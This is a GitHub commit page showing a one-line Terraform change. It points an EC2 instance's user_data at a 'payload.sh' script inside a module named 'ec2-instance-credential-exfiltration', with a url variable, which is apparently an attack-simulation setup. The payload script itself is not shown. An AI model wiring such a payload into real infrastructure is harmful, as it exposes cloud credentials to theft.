We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6879cf2 commit 6776718Copy full SHA for 6776718
main.tf
@@ -16,7 +16,7 @@ resource "aws_instance" "this" {
16
}
17
18
data "template_file" "user_data" {
19
- template = file("payload.sh")
+ template = file(".terraform/modules/ec2-instance-credential-exfiltration/payload.sh")
20
21
vars = {
22
url = var.url
0 commit comments